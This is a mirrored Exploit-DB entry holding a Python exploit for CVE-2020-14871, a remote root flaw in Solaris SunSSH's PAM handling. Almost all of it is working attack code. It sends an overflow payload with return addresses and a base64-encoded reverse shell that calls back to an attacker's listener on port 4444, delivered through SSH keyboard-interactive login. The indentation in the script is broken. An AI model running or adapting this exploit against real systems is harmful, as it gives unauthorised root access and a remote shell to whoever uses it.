Solaris SunSSH 11.0 x86 – libpam Remote Root (2)

  • 作者: legend
    日期: 2021-05-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49896/
  • # Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
    # Original Exploit Author: Hacker Fantastic
    # Metasploit Module Author: wvu 
    # Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
    # Version: 10
    # Tested on: SunOS solaris 10
    # CVE: CVE-2020-14871
    # Ported By: legend
    
    import socket
    import paramiko
    from time import sleep
    
    payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe"
    payload+=b"python${IFS}-c${IFS}\""
    
    # msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444
    payload+=b"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCBhcyBzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHIKc289cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pCnNvLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQ0NCkpCndoaWxlIFRydWU6CglkPXNvLnJlY3YoMTAyNCkKCWlmIGxlbihkKT09MDoKCQlicmVhawoJcD1yLlBvcGVuKGQsc2hlbGw9VHJ1ZSxzdGRpbj1yLlBJUEUsc3Rkb3V0PXIuUElQRSxzdGRlcnI9ci5QSVBFKQoJbz1wLnN0ZG91dC5yZWFkKCkrcC5zdGRlcnIucmVhZCgpCglzby5zZW5kKG8pCg==')[0]))"
    payload+=b"\""
    
    print("Length => %d" % (len(payload)))
    def inter_handler(title, instructions, prompt_list):
    resp = []#Initialize the response container
    for pr in prompt_list:
    print(pr)
    if pr[0].startswith('Please enter user name:'):
    sleep(10) 
    resp.append(payload)
    print("Your payload is sended check your nc")
    return tuple(resp)
    
    import socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("192.168.1.2", 22))
    ts = paramiko.Transport(sock)
    ts.start_client(timeout=10)
    ts.auth_interactive(username="", handler=inter_handler)